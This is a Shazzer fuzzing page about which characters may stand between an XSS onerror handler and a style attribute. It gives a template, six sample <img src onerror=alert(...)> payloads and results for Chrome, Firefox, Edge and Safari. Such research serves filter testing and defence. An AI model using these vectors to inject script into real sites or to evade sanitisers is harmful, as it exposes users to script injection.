Shazzer logo
Login

Chars allowed before style attribute...

Chrome logo 6
Firefox logo 6
Edge logo 6
Safari logo 6

This XSS vector shows what characters can be used before the onerror event.

t0xodile
Created byt0xodile
Created Oct 25, 2025
Updated Oct 25, 2025

Tweet
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<img src onerror=log($[i])$[chr]style=display:block;content-visibility:auto>

Sample payloads

<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>
<img src onerror=alert(10)
style=display:block;content-visibility:auto>
<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>
<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>
<img src onerror=alert(32) style=display:block;content-visibility:auto>
<img src onerror=alert(62)>style=display:block;content-visibility:auto>

Fuzz results

Chrome logo
Chrome 144.0.0.0 desktop macOS 10.15.7

Updated

Sun Jan 25 2026
Found 6 results
Loading...
Chrome logo
Chrome 139.0.0.0 desktop Linux Unknownolder version

Updated

Sat Oct 25 2025
Found 6 results
Loading...
Firefox logo
Firefox 147.0 desktop macOS 10.15

Updated

Sun Jan 25 2026
Found 6 results
Loading...
Edge logo
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0

Updated

Mon Jan 26 2026
Found 6 results
Loading...
Safari logo
Safari 26.2 mobile iOS 18.7

Updated

Thu Jan 29 2026
Found 6 results
Loading...
Safari logo
Safari 17.2 mobile iOS 17.2.1older version

Updated

Thu Jan 29 2026
Found 6 results
Loading...

Distributed Fuzzing

Enabled:
Status:disconnected
Your browser automatically contributes to distributed fuzzing when idle.